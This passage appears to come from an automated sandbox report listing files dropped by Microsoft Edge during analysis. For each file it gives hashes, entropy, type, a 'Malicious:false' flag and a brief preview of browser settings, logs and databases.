                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):38626
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.554568395177905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMf0V8F1+UoAYDCx9Tuqh0VfUC9xbog/OVjE0TMkUrwCsKL:CJakCwXchgGWPSMf0Vu1ja95kNCsKNvB
                                                                                                                                                                                                                                                                                                                          MD5:25403A3A82CD106DF8F34777BF7BBD3B
                                                                                                                                                                                                                                                                                                                          SHA1:5D76480B317925C5686C44E3BD397B5AAB18E65C
                                                                                                                                                                                                                                                                                                                          SHA-256:571D3E6A2C9C11C464BD046D546C3E7680A77993361472A1D760CCA9B8EB8497
                                                                                                                                                                                                                                                                                                                          SHA-512:79561E1B1DE6E2B097A28CEF93CD4BEE0FE40227105525582818D84387A6F76304A8204F5918036363CB242A16794C6F8DDA77E6887266EDA67A8D4FB4C14E6F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.10265547996659595
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:+RL+URL+FspEjVl/PnnnnnnnnnnnvoQ/Eou:+oUo+oPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                                          MD5:F8A278F13B1FAB45077285E96DB92F5D
                                                                                                                                                                                                                                                                                                                          SHA1:75DB7A2505D9C6C30585BCA6E8B2285CBA1F56DE
                                                                                                                                                                                                                                                                                                                          SHA-256:8D24892DCD9275C2F2C71CD1BC2A85BEFC67C97FDA163288479DC2582DA107DA
                                                                                                                                                                                                                                                                                                                          SHA-512:84ECBF598618DF8BF3EEC4A98BE5EED451FDF9489C65E4327A44CDD357DFAA5A4A4C8CE4B8FFEC28A580F2937F9C8C3D0E48340F23C0EC0E30BFA4F9F7C1DC24
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):317272
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8889582805380969
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:G2V8yH/AwaSceady+HLP3H8w12yv8nytytsycyP9y7xyQb:oz
                                                                                                                                                                                                                                                                                                                          MD5:7F56E4C9E001C4DCAB6EDFBF15E57245
                                                                                                                                                                                                                                                                                                                          SHA1:E9DA590587F6E73B8C4E1A3902552B194C50681C
                                                                                                                                                                                                                                                                                                                          SHA-256:38D4238424CCCA6796EBE64AA00DBEC7146E81AB7804B78F2109371D123C5522
                                                                                                                                                                                                                                                                                                                          SHA-512:5F7003B5101625E7AEF27F0176468747FE40CB63EF93F1E9C9B39467314320AAA81342E8048C33C8FD6AACEFF1804915F481ADBCAE7C748B156E3E30D42C44A9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):694
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5541561316994215
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuOlluJoZ8r:iDTlg3
                                                                                                                                                                                                                                                                                                                          MD5:190FF2F506CD2B4FBA8B32277CEF6133
                                                                                                                                                                                                                                                                                                                          SHA1:745B8AB804DFA239E3B36529A6E1E31C7380B88C
                                                                                                                                                                                                                                                                                                                          SHA-256:065E6E998E9CC0CCB6004A47E1115007BB5074A32B7E9313AF06129703FEBEC6
                                                                                                                                                                                                                                                                                                                          SHA-512:07DC34B900CEDAEA0A964B760791761F6E56BCA1C5242066C2057F00F9424A90A116B67FD5A38EFDF675BBFC1EF4F5FDD41797F6DB95DF51E543827610E8FE34
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197603056225723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uLZ+q2P923oH+TcwtfrK+IFUtQucZmwuucVkwO923oH+TcwtfrUeLJ:76uLUv4Yeb23FUtQuc/uuc5LYeb3J
                                                                                                                                                                                                                                                                                                                          MD5:47061CD87372191BB4658BBF3D481F55
                                                                                                                                                                                                                                                                                                                          SHA1:4CB6E3F49A2FC43ABE783ADF05679F4251559564
                                                                                                                                                                                                                                                                                                                          SHA-256:2C5CCF6C62EDC8831643B92DCEB74AC09926660B7A56FAD53F01A718327C645B
                                                                                                                                                                                                                                                                                                                          SHA-512:0BD4056A870B7BB40A43D10C52CBC19E132F583C09B096E8087E4E22B211880208803769D35FB6144AB12AC5721E903DA01DBE1BA111730CF81EFB9D412BCC79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.714 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/12-11:23:05.717 1bc8 Recovering log #3.2025/01/12-11:23:05.717 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.197603056225723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uLZ+q2P923oH+TcwtfrK+IFUtQucZmwuucVkwO923oH+TcwtfrUeLJ:76uLUv4Yeb23FUtQuc/uuc5LYeb3J
                                                                                                                                                                                                                                                                                                                          MD5:47061CD87372191BB4658BBF3D481F55
                                                                                                                                                                                                                                                                                                                          SHA1:4CB6E3F49A2FC43ABE783ADF05679F4251559564
                                                                                                                                                                                                                                                                                                                          SHA-256:2C5CCF6C62EDC8831643B92DCEB74AC09926660B7A56FAD53F01A718327C645B
                                                                                                                                                                                                                                                                                                                          SHA-512:0BD4056A870B7BB40A43D10C52CBC19E132F583C09B096E8087E4E22B211880208803769D35FB6144AB12AC5721E903DA01DBE1BA111730CF81EFB9D412BCC79
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.714 1bc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/12-11:23:05.717 1bc8 Recovering log #3.2025/01/12-11:23:05.717 1bc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):787
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                                          MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                                          SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                                          SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                                          SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):342
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.158568551697825
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u2+q2P923oH+TcwtfrzAdIFUtQufZmwuufVkwO923oH+TcwtfrzILJ:76u3v4Yeb9FUtQuf/uuN5LYeb2J
                                                                                                                                                                                                                                                                                                                          MD5:60FA0C6E874404B253A99A985B442B9D
                                                                                                                                                                                                                                                                                                                          SHA1:E9E4E6B80BC1FFB1917A19C7D3A367618095FEFC
                                                                                                                                                                                                                                                                                                                          SHA-256:BD161416D82C9E93D0F40122A1047C08140D3823D10E4540C77EBD1A79321C70
                                                                                                                                                                                                                                                                                                                          SHA-512:F6C63B8757C7B70B97CC3F8140FB69A2BABD9F24457191F7F88F7E188C1AF33D9BF18D8882AF64C84DA667FC0A28F47183181C6FA2B06D5F218EA5D73B7E5519
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.707 1ff8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/12-11:23:05.708 1ff8 Recovering log #3.2025/01/12-11:23:05.708 1ff8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):120
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
